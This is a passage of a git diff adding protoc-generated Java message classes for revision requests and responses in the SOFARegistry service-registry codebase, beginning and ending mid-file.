(com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + if (((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = revisions_.getUnmodifiableView(); + } + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsRequest_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsRequest_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest.class, + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest.Builder.class); + } + + public static final int REVISIONS_FIELD_NUMBER = 1; + private com.google.protobuf.LazyStringList revisions_; + /** repeated string revisions = 1; */ + public com.google.protobuf.ProtocolStringList getRevisionsList() { + return revisions_; + } + /** repeated string revisions = 1; */ + public int getRevisionsCount() { + return revisions_.size(); + } + /** repeated string revisions = 1; */ + public java.lang.String getRevisions(int index) { + return revisions_.get(index); + } + /** repeated string revisions = 1; */ + public com.google.protobuf.ByteString getRevisionsBytes(int index) { + return revisions_.getByteString(index); + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + for (int i = 0; i < revisions_.size(); i++) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 1, revisions_.getRaw(i)); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + { + int dataSize = 0; + for (int i = 0; i < revisions_.size(); i++) { + dataSize += computeStringSizeNoTag(revisions_.getRaw(i)); + } + size += dataSize; + size += 1 * getRevisionsList().size(); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest other = + (com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest) obj; + + boolean result = true; + result = result && getRevisionsList().equals(other.getRevisionsList()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (getRevisionsCount() > 0) { + hash = (37 * hash) + REVISIONS_FIELD_NUMBER; + hash = (53 * hash) + getRevisionsList().hashCode(); + } + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code GetRevisionsRequest} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:GetRevisionsRequest) + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequestOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsRequest_descriptor; + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsRequest_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest.class, + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest.Builder.class); + } + + // Construct using + // com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest.newBuilder() + private Builder() { + maybeForceBuilderInitialization(); + } + + private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + super(parent); + maybeForceBuilderInitialization(); + } + + private void maybeForceBuilderInitialization() { + if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {} + } + + public Builder clear() { + super.clear(); + revisions_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + return this; + } + + public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsRequest_descriptor; + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + getDefaultInstanceForType() { + return com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + .getDefaultInstance(); + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest build() { + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest result = buildPartial(); + if (!result.isInitialized()) { + throw newUninitializedMessageException(result); + } + return result; + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest buildPartial() { + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest result = + new com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest(this); + int from_bitField0_ = bitField0_; + if (((bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = revisions_.getUnmodifiableView(); + bitField0_ = (bitField0_ & ~0x00000001); + } + result.revisions_ = revisions_; + onBuilt(); + return result; + } + + public Builder clone() { + return (Builder) super.clone(); + } + + public Builder setField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.setField(field, value); + } + + public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) { + return (Builder) super.clearField(field); + } + + public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) { + return (Builder) super.clearOneof(oneof); + } + + public Builder setRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { + return (Builder) super.setRepeatedField(field, index, value); + } + + public Builder addRepeatedField( + com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { + return (Builder) super.addRepeatedField(field, value); + } + + public Builder mergeFrom(com.google.protobuf.Message other) { + if (other instanceof com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest) { + return mergeFrom( + (com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest) other); + } else { + super.mergeFrom(other); + return this; + } + } + + public Builder mergeFrom( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest other) { + if (other + == com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + .getDefaultInstance()) return this; + if (!other.revisions_.isEmpty()) { + if (revisions_.isEmpty()) { + revisions_ = other.revisions_; + bitField0_ = (bitField0_ & ~0x00000001); + } else { + ensureRevisionsIsMutable(); + revisions_.addAll(other.revisions_); + } + onChanged(); + } + this.mergeUnknownFields(other.unknownFields); + onChanged(); + return this; + } + + public final boolean isInitialized() { + return true; + } + + public Builder mergeFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest parsedMessage = null; + try { + parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry); + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + parsedMessage = + (com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest) + e.getUnfinishedMessage(); + throw e.unwrapIOException(); + } finally { + if (parsedMessage != null) { + mergeFrom(parsedMessage); + } + } + return this; + } + + private int bitField0_; + + private com.google.protobuf.LazyStringList revisions_ = + com.google.protobuf.LazyStringArrayList.EMPTY; + + private void ensureRevisionsIsMutable() { + if (!((bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = new com.google.protobuf.LazyStringArrayList(revisions_); + bitField0_ |= 0x00000001; + } + } + /** repeated string revisions = 1; */ + public com.google.protobuf.ProtocolStringList getRevisionsList() { + return revisions_.getUnmodifiableView(); + } + /** repeated string revisions = 1; */ + public int getRevisionsCount() { + return revisions_.size(); + } + /** repeated string revisions = 1; */ + public java.lang.String getRevisions(int index) { + return revisions_.get(index); + } + /** repeated string revisions = 1; */ + public com.google.protobuf.ByteString getRevisionsBytes(int index) { + return revisions_.getByteString(index); + } + /** repeated string revisions = 1; */ + public Builder setRevisions(int index, java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureRevisionsIsMutable(); + revisions_.set(index, value); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder addRevisions(java.lang.String value) { + if (value == null) { + throw new NullPointerException(); + } + ensureRevisionsIsMutable(); + revisions_.add(value); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder addAllRevisions(java.lang.Iterable values) { + ensureRevisionsIsMutable(); + com.google.protobuf.AbstractMessageLite.Builder.addAll(values, revisions_); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder clearRevisions() { + revisions_ = com.google.protobuf.LazyStringArrayList.EMPTY; + bitField0_ = (bitField0_ & ~0x00000001); + onChanged(); + return this; + } + /** repeated string revisions = 1; */ + public Builder addRevisionsBytes(com.google.protobuf.ByteString value) { + if (value == null) { + throw new NullPointerException(); + } + checkByteStringIsUtf8(value); + ensureRevisionsIsMutable(); + revisions_.add(value); + onChanged(); + return this; + } + + public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.setUnknownFieldsProto3(unknownFields); + } + + public final Builder mergeUnknownFields( + final com.google.protobuf.UnknownFieldSet unknownFields) { + return super.mergeUnknownFields(unknownFields); + } + + // @@protoc_insertion_point(builder_scope:GetRevisionsRequest) + } + + // @@protoc_insertion_point(class_scope:GetRevisionsRequest) + private static final com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + DEFAULT_INSTANCE; + + static { + DEFAULT_INSTANCE = new com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest(); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + getDefaultInstance() { + return DEFAULT_INSTANCE; + } + + private static final com.google.protobuf.Parser PARSER = + new com.google.protobuf.AbstractParser() { + public GetRevisionsRequest parsePartialFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return new GetRevisionsRequest(input, extensionRegistry); + } + }; + + public static com.google.protobuf.Parser parser() { + return PARSER; + } + + @java.lang.Override + public com.google.protobuf.Parser getParserForType() { + return PARSER; + } + + public com.alipay.sofa.registry.common.model.client.pb.GetRevisionsRequest + getDefaultInstanceForType() { + return DEFAULT_INSTANCE; + } +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsRequestOrBuilder.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsRequestOrBuilder.java new file mode 100644 index 000000000..1e234d6e8 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsRequestOrBuilder.java @@ -0,0 +1,32 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +public interface GetRevisionsRequestOrBuilder + extends + // @@protoc_insertion_point(interface_extends:GetRevisionsRequest) + com.google.protobuf.MessageOrBuilder { + + /** repeated string revisions = 1; */ + java.util.List getRevisionsList(); + /** repeated string revisions = 1; */ + int getRevisionsCount(); + /** repeated string revisions = 1; */ + java.lang.String getRevisions(int index); + /** repeated string revisions = 1; */ + com.google.protobuf.ByteString getRevisionsBytes(int index); +} diff --git a/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsResponse.java b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsResponse.java new file mode 100644 index 000000000..7085a2821 --- /dev/null +++ b/server/common/model/src/main/java/com/alipay/sofa/registry/common/model/client/pb/GetRevisionsResponse.java @@ -0,0 +1,848 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.common.model.client.pb; + +/** Protobuf type {@code GetRevisionsResponse} */ +public final class GetRevisionsResponse extends com.google.protobuf.GeneratedMessageV3 + implements + // @@protoc_insertion_point(message_implements:GetRevisionsResponse) + GetRevisionsResponseOrBuilder { + private static final long serialVersionUID = 0L; + // Use GetRevisionsResponse.newBuilder() to construct. + private GetRevisionsResponse(com.google.protobuf.GeneratedMessageV3.Builder builder) { + super(builder); + } + + private GetRevisionsResponse() { + statusCode_ = 0; + message_ = ""; + } + + @java.lang.Override + public final com.google.protobuf.UnknownFieldSet getUnknownFields() { + return this.unknownFields; + } + + private GetRevisionsResponse( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + this(); + if (extensionRegistry == null) { + throw new java.lang.NullPointerException(); + } + int mutable_bitField0_ = 0; + com.google.protobuf.UnknownFieldSet.Builder unknownFields = + com.google.protobuf.UnknownFieldSet.newBuilder(); + try { + boolean done = false; + while (!done) { + int tag = input.readTag(); + switch (tag) { + case 0: + done = true; + break; + default: + { + if (!parseUnknownFieldProto3(input, unknownFields, extensionRegistry, tag)) { + done = true; + } + break; + } + case 10: + { + if (!((mutable_bitField0_ & 0x00000001) == 0x00000001)) { + revisions_ = + com.google.protobuf.MapField.newMapField( + RevisionsDefaultEntryHolder.defaultEntry); + mutable_bitField0_ |= 0x00000001; + } + com.google.protobuf.MapEntry< + java.lang.String, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + revisions__ = + input.readMessage( + RevisionsDefaultEntryHolder.defaultEntry.getParserForType(), + extensionRegistry); + revisions_.getMutableMap().put(revisions__.getKey(), revisions__.getValue()); + break; + } + case 16: + { + statusCode_ = input.readInt32(); + break; + } + case 26: + { + java.lang.String s = input.readStringRequireUtf8(); + + message_ = s; + break; + } + } + } + } catch (com.google.protobuf.InvalidProtocolBufferException e) { + throw e.setUnfinishedMessage(this); + } catch (java.io.IOException e) { + throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this); + } finally { + this.unknownFields = unknownFields.build(); + makeExtensionsImmutable(); + } + } + + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsResponse_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 1: + return internalGetRevisions(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable + internalGetFieldAccessorTable() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsResponse_fieldAccessorTable + .ensureFieldAccessorsInitialized( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse.class, + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse.Builder.class); + } + + private int bitField0_; + public static final int REVISIONS_FIELD_NUMBER = 1; + + private static final class RevisionsDefaultEntryHolder { + static final com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + defaultEntry = + com.google.protobuf.MapEntry + . + newDefaultInstance( + com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsResponse_RevisionsEntry_descriptor, + com.google.protobuf.WireFormat.FieldType.STRING, + "", + com.google.protobuf.WireFormat.FieldType.MESSAGE, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister + .getDefaultInstance()); + } + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + revisions_; + + private com.google.protobuf.MapField< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + internalGetRevisions() { + if (revisions_ == null) { + return com.google.protobuf.MapField.emptyMapField(RevisionsDefaultEntryHolder.defaultEntry); + } + return revisions_; + } + + public int getRevisionsCount() { + return internalGetRevisions().getMap().size(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public boolean containsRevisions(java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + return internalGetRevisions().getMap().containsKey(key); + } + /** Use {@link #getRevisionsMap()} instead. */ + @java.lang.Deprecated + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + getRevisions() { + return getRevisionsMap(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public java.util.Map< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + getRevisionsMap() { + return internalGetRevisions().getMap(); + } + /** map<string, .MetaRegister> revisions = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister getRevisionsOrDefault( + java.lang.String key, + com.alipay.sofa.registry.common.model.client.pb.MetaRegister defaultValue) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetRevisions().getMap(); + return map.containsKey(key) ? map.get(key) : defaultValue; + } + /** map<string, .MetaRegister> revisions = 1; */ + public com.alipay.sofa.registry.common.model.client.pb.MetaRegister getRevisionsOrThrow( + java.lang.String key) { + if (key == null) { + throw new java.lang.NullPointerException(); + } + java.util.Map + map = internalGetRevisions().getMap(); + if (!map.containsKey(key)) { + throw new java.lang.IllegalArgumentException(); + } + return map.get(key); + } + + public static final int STATUSCODE_FIELD_NUMBER = 2; + private int statusCode_; + /** int32 statusCode = 2; */ + public int getStatusCode() { + return statusCode_; + } + + public static final int MESSAGE_FIELD_NUMBER = 3; + private volatile java.lang.Object message_; + /** string message = 3; */ + public java.lang.String getMessage() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + return (java.lang.String) ref; + } else { + com.google.protobuf.ByteString bs = (com.google.protobuf.ByteString) ref; + java.lang.String s = bs.toStringUtf8(); + message_ = s; + return s; + } + } + /** string message = 3; */ + public com.google.protobuf.ByteString getMessageBytes() { + java.lang.Object ref = message_; + if (ref instanceof java.lang.String) { + com.google.protobuf.ByteString b = + com.google.protobuf.ByteString.copyFromUtf8((java.lang.String) ref); + message_ = b; + return b; + } else { + return (com.google.protobuf.ByteString) ref; + } + } + + private byte memoizedIsInitialized = -1; + + public final boolean isInitialized() { + byte isInitialized = memoizedIsInitialized; + if (isInitialized == 1) return true; + if (isInitialized == 0) return false; + + memoizedIsInitialized = 1; + return true; + } + + public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { + com.google.protobuf.GeneratedMessageV3.serializeStringMapTo( + output, internalGetRevisions(), RevisionsDefaultEntryHolder.defaultEntry, 1); + if (statusCode_ != 0) { + output.writeInt32(2, statusCode_); + } + if (!getMessageBytes().isEmpty()) { + com.google.protobuf.GeneratedMessageV3.writeString(output, 3, message_); + } + unknownFields.writeTo(output); + } + + public int getSerializedSize() { + int size = memoizedSize; + if (size != -1) return size; + + size = 0; + for (java.util.Map.Entry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + entry : internalGetRevisions().getMap().entrySet()) { + com.google.protobuf.MapEntry< + java.lang.String, com.alipay.sofa.registry.common.model.client.pb.MetaRegister> + revisions__ = + RevisionsDefaultEntryHolder.defaultEntry + .newBuilderForType() + .setKey(entry.getKey()) + .setValue(entry.getValue()) + .build(); + size += com.google.protobuf.CodedOutputStream.computeMessageSize(1, revisions__); + } + if (statusCode_ != 0) { + size += com.google.protobuf.CodedOutputStream.computeInt32Size(2, statusCode_); + } + if (!getMessageBytes().isEmpty()) { + size += com.google.protobuf.GeneratedMessageV3.computeStringSize(3, message_); + } + size += unknownFields.getSerializedSize(); + memoizedSize = size; + return size; + } + + @java.lang.Override + public boolean equals(final java.lang.Object obj) { + if (obj == this) { + return true; + } + if (!(obj instanceof com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse)) { + return super.equals(obj); + } + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse other = + (com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse) obj; + + boolean result = true; + result = result && internalGetRevisions().equals(other.internalGetRevisions()); + result = result && (getStatusCode() == other.getStatusCode()); + result = result && getMessage().equals(other.getMessage()); + result = result && unknownFields.equals(other.unknownFields); + return result; + } + + @java.lang.Override + public int hashCode() { + if (memoizedHashCode != 0) { + return memoizedHashCode; + } + int hash = 41; + hash = (19 * hash) + getDescriptor().hashCode(); + if (!internalGetRevisions().getMap().isEmpty()) { + hash = (37 * hash) + REVISIONS_FIELD_NUMBER; + hash = (53 * hash) + internalGetRevisions().hashCode(); + } + hash = (37 * hash) + STATUSCODE_FIELD_NUMBER; + hash = (53 * hash) + getStatusCode(); + hash = (37 * hash) + MESSAGE_FIELD_NUMBER; + hash = (53 * hash) + getMessage().hashCode(); + hash = (29 * hash) + unknownFields.hashCode(); + memoizedHashCode = hash; + return hash; + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + com.google.protobuf.ByteString data) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + com.google.protobuf.ByteString data, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws com.google.protobuf.InvalidProtocolBufferException { + return PARSER.parseFrom(data, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse + parseDelimitedFrom( + java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException( + PARSER, input, extensionRegistry); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + com.google.protobuf.CodedInputStream input) throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input); + } + + public static com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse parseFrom( + com.google.protobuf.CodedInputStream input, + com.google.protobuf.ExtensionRegistryLite extensionRegistry) + throws java.io.IOException { + return com.google.protobuf.GeneratedMessageV3.parseWithIOException( + PARSER, input, extensionRegistry); + } + + public Builder newBuilderForType() { + return newBuilder(); + } + + public static Builder newBuilder() { + return DEFAULT_INSTANCE.toBuilder(); + } + + public static Builder newBuilder( + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponse prototype) { + return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); + } + + public Builder toBuilder() { + return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); + } + + @java.lang.Override + protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { + Builder builder = new Builder(parent); + return builder; + } + /** Protobuf type {@code GetRevisionsResponse} */ + public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder + implements + // @@protoc_insertion_point(builder_implements:GetRevisionsResponse) + com.alipay.sofa.registry.common.model.client.pb.GetRevisionsResponseOrBuilder { + public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { + return com.alipay.sofa.registry.common.model.client.pb.AppDiscoveryMetaPb + .internal_static_GetRevisionsResponse_descriptor; + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMapField(int number) { + switch (number) { + case 1: + return internalGetRevisions(); + default: + throw new RuntimeException("Invalid map field number: " + number); + } + } + + @SuppressWarnings({"rawtypes"}) + protected com.google.protobuf.MapField internalGetMutableMapField(int number) { + switch (number) { + case 1: + return 